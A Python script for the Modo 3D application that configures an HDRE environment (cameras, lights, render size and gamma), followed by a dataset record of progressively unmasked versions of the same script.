frame_width = int((clip_width/clip_height) * 1024)
lx.eval('render.res 0 %s' % frame_width)
lx.eval('render.res 1 %s' % frame_height)
except:
lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
try:
# close previously open backdrop browser if there is one
if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):
cookie = lx.eval('user.value HDRE_Card ?')
lx.eval('layout.createOrClose {%s} open:0' % cookie)
selectedItem = lx.eval1('query sceneservice selection ? locator')
rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)
# check to see if an HDRE environment already exists and clear it out if it does.
# this is a bit of a hack, we have to test to see if one of our known items exists
# with an incremented name. If it does we delete all HDRE items with names that
# are not incremented and then rename all the ones that are - YUK!!!!
numcams = lx.eval('query sceneservice camera.N ? all')
for x in xrange(numcams):
camname = lx.eval('query sceneservice camera.name ? %s' % x)
if camname in camnames.keys():
incr = camnames[camname]
clearold()
renamenew(incr)
break
if itemexists('HDRECam'):
# set animate camera focal length
if itemexists('HDRECamAnimate'):
flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3) * 1000
if flength >= 101 and flength <= 200:
flength = flength + 100
elif flength >= 51 and flength <= 100:
flength = flength + 50
elif flength >= 18 and flength <= 50:
flength = flength + 10
lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' % flength)
lx.eval('render.camera HDRECamAnimate')
lockanimcamera()
lx.eval('render.camera HDRECam')
# group and lock the camera
lockcamera()
renID = lx.eval('query sceneservice polyRender.ID ? 0')
lx.eval('item.channel globEnable true item:%s' % renID)
lx.eval('item.channel dispRate 3 item:%s' % renID)
lx.eval('item.channel dispRatio 8 item:%s' % renID)
# set the scene gamma
numouts = lx.eval('query sceneservice renderOutput.N ? all')
for x in xrange(numouts):
id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)
lx.eval('select.item %s set' % id)
if lx.eval('shader.setEffect ?') == 'shade.color':
lx.eval('item.channel gamma 2.2 item:%s' % id)
num_envs = lx.eval('query sceneservice environment.N ? all')
environments = []
for x in xrange(num_envs):
environments.append(lx.eval('query sceneservice environment.name ? %s' % x))
for env in environments:
if env not in HDREEnvs:
lx.eval('item.channel visCam false item:{%s}' % env)
lx.eval('item.channel visInd false item:{%s}' % env)
lx.eval('item.channel visRefl false item:{%s}' % env)
lx.eval('item.channel visRefr false item:{%s}' % env)
numlights = lx.eval('query sceneservice light.N ? all')
for x in xrange(numlights):
if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':
id = lx.eval('query sceneservice light.ID ? %s' % x)
lx.eval('layer.setVisibility {%s} 0' % id)
if itemexists('HDREActivate'):
lx.eval('layer.setVisibility {HDREActivate} 0')
controlsID = lx.eval('query sceneservice item.ID ? HDREControls')
if controlsID:
lx.eval('layer.setVisibility {%s} 1' % controlsID)
# set render frame size
setframesize()
tagitems()
except:
lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
|
normal
|
{
"blob_id": "78a96020abfd393438c2fce1dfd5fd159a23ca5a",
"index": 9666,
"step-1": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\n<mask token>\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\n<mask token>\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ntry:\n if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)\n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n if itemexists('HDRECam'):\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3\n ) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' %\n flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n lockcamera()\n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval(\n 'query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? %s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n setframesize()\n tagitems()\nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback\n .tb_lineno))\n",
"step-4": "camnames = {'HDRECam (2)': ' (2)', 'HDRECam(2)': '(2)', 'HDRECam 2': ' 2',\n 'HDRECam_2': '_2', 'HDRECam2': '2'}\nHDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']\n\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n\n\ndef hastag(item):\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % item)\n if lx.eval('item.tag HDRE ?') == 'set':\n return true\n\n\ndef clearold():\n try:\n numenvs = lx.eval('query sceneservice environment.N ? all')\n envs = []\n oldclips = []\n for x in xrange(numenvs):\n envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n layer, process = lx.eval(\n 'query sceneservice mask.children ? {%s}' % env)\n lx.eval('select.item {%s} set' % layer)\n oldclips.append(lx.eval('texture.setIMap ?'))\n for env in envs:\n lx.eval('select.item %s set' % env)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')\n grplocs = []\n for x in xrange(numgrplocs):\n grplocs.append(lx.eval(\n 'query sceneservice groupLocator.ID ? %s' % x))\n for loc in grplocs:\n lx.eval('select.item %s set' % loc)\n if lx.eval('item.tag string HDRE ?') == 'set':\n lx.eval('!!item.delete')\n break\n lx.eval('select.itemPattern HDREGroup')\n id = lx.eval1('query sceneservice selection ? mask')\n parent = lx.eval('query sceneservice mask.parent ? %s' % id)\n lx.eval('select.item %s set' % parent)\n lx.eval('texture.delete')\n for clip in oldclips:\n lx.eval('select.drop item')\n lx.eval('select.item {%s} set' % clip)\n lx.eval('clip.delete')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef renamenew(incr):\n try:\n lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)\n lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)\n lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)\n lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)\n lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)\n lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)\n lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)\n lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)\n lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr\n )\n lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)\n lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)\n lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)\n lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)\n root = lx.eval('query sceneservice item.parent ? HDRECam')\n rootname = lx.eval('query sceneservice item.name ? %s' % root)\n newname = rootname.split(incr)[0]\n lx.eval('item.name {%s} item:{%s}' % (newname, rootname))\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef tagitems():\n try:\n lx.eval('select.drop item')\n for item in HDREEnvs:\n lx.eval('select.item {%s} set' % item)\n lx.eval('item.tag string {HDRE} {set}')\n lx.eval('select.item {%s} set' % rootID)\n lx.eval('item.tag string {HDRE} {set}')\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ndef setframesize():\n try:\n backplate = None\n envchildren = lx.eval(\n 'query sceneservice item.children ? HDREBackplate')\n for child in envchildren:\n if lx.eval('query sceneservice item.type ? {%s}' % child\n ) == 'imageMap':\n lx.eval('select.item %s set' % child)\n backplate = lx.eval('texture.setIMap ?')\n break\n if backplate:\n clip_width = None\n clip_height = None\n clips = lx.evalN('query layerservice clips ? all')\n for clip in clips:\n if lx.eval('query layerservice clip.name ? {%s}' % clip\n ) == backplate:\n info = lx.eval('query layerservice clip.info ? {%s}' % clip\n ).split()\n clip_width = float(info[1].split(':')[1])\n clip_height = float(info[2].split(':')[1])\n if clip_width != None and clip_height != None:\n if clip_width > clip_height:\n frame_width = 1024\n frame_height = int(clip_height / clip_width * 1024)\n else:\n frame_height = 1024\n frame_width = int(clip_width / clip_height * 1024)\n lx.eval('render.res 0 %s' % frame_width)\n lx.eval('render.res 1 %s' % frame_height)\n except:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.\n exc_traceback.tb_lineno))\n\n\ntry:\n if lx.eval('query scriptsysservice userValue.isDefined ? HDRE_Card'):\n cookie = lx.eval('user.value HDRE_Card ?')\n lx.eval('layout.createOrClose {%s} open:0' % cookie)\n selectedItem = lx.eval1('query sceneservice selection ? locator')\n rootID = lx.eval('query sceneservice item.parent ? %s' % selectedItem)\n numcams = lx.eval('query sceneservice camera.N ? all')\n for x in xrange(numcams):\n camname = lx.eval('query sceneservice camera.name ? %s' % x)\n if camname in camnames.keys():\n incr = camnames[camname]\n clearold()\n renamenew(incr)\n break\n if itemexists('HDRECam'):\n if itemexists('HDRECamAnimate'):\n flength = round(lx.eval('item.channel focalLen ? item:HDRECam'), 3\n ) * 1000\n if flength >= 101 and flength <= 200:\n flength = flength + 100\n elif flength >= 51 and flength <= 100:\n flength = flength + 50\n elif flength >= 18 and flength <= 50:\n flength = flength + 10\n lx.eval('item.channel focalLen [%s mm] item:HDRECamAnimate' %\n flength)\n lx.eval('render.camera HDRECamAnimate')\n lockanimcamera()\n lx.eval('render.camera HDRECam')\n lockcamera()\n renID = lx.eval('query sceneservice polyRender.ID ? 0')\n lx.eval('item.channel globEnable true item:%s' % renID)\n lx.eval('item.channel dispRate 3 item:%s' % renID)\n lx.eval('item.channel dispRatio 8 item:%s' % renID)\n numouts = lx.eval('query sceneservice renderOutput.N ? all')\n for x in xrange(numouts):\n id = lx.eval('query sceneservice renderOutput.ID ? %s' % x)\n lx.eval('select.item %s set' % id)\n if lx.eval('shader.setEffect ?') == 'shade.color':\n lx.eval('item.channel gamma 2.2 item:%s' % id)\n num_envs = lx.eval('query sceneservice environment.N ? all')\n environments = []\n for x in xrange(num_envs):\n environments.append(lx.eval(\n 'query sceneservice environment.name ? %s' % x))\n for env in environments:\n if env not in HDREEnvs:\n lx.eval('item.channel visCam false item:{%s}' % env)\n lx.eval('item.channel visInd false item:{%s}' % env)\n lx.eval('item.channel visRefl false item:{%s}' % env)\n lx.eval('item.channel visRefr false item:{%s}' % env)\n numlights = lx.eval('query sceneservice light.N ? all')\n for x in xrange(numlights):\n if lx.eval('query sceneservice light.name ? %s' % x) != 'HDRESun':\n id = lx.eval('query sceneservice light.ID ? %s' % x)\n lx.eval('layer.setVisibility {%s} 0' % id)\n if itemexists('HDREActivate'):\n lx.eval('layer.setVisibility {HDREActivate} 0')\n controlsID = lx.eval('query sceneservice item.ID ? HDREControls')\n if controlsID:\n lx.eval('layer.setVisibility {%s} 1' % controlsID)\n setframesize()\n tagitems()\nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback\n .tb_lineno))\n",
"step-5": "#!/usr/bin/env python\n\n################################################################################\n#\n# HDREEnable.py\n#\n# Version: 1.000\n#\n# Author: Gwynne Reddick\n#\n# Description:\n# \n#\n# Usage: \n#\n# Last Update 16:49 08/12/10 \n#\n################################################################################\n\n# part of a hack for later on so we can identify if a second HDRE assembly has been applied\ncamnames = {'HDRECam (2)':' (2)',\n 'HDRECam(2)':'(2)',\n 'HDRECam 2':' 2',\n 'HDRECam_2':'_2',\n 'HDRECam2':'2'}\n\nHDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']\n\ndef itemexists(name):\n lx.eval('select.item {%s} set' % name)\n selected = lx.evalN('item.name ?')\n return name in selected\n\ndef lockcamera():\n if not itemexists('HDRECam_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECam_Grp')\n lx.eval('select.subItem HDRECam set camera')\n lx.eval('!!group.edit add item')\n lx.eval('select.item HDRECam_Grp set')\n lx.eval('item.channel lock on item:HDRECam_Grp')\n\ndef lockanimcamera():\n if not itemexists('HDRECamAnimate_Grp'):\n lx.eval('select.drop item')\n lx.eval('group.create')\n lx.eval('item.name HDRECamAnimate_Grp')\n xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')\n lx.eval('select.channel {%s:pos.X} set' % xfrmitem)\n lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)\n lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)\n lx.eval('!!group.edit add chan')\n lx.eval('item.channel lock on item:HDRECamAnimate_Grp')\n \n\ndef hastag(item):\n 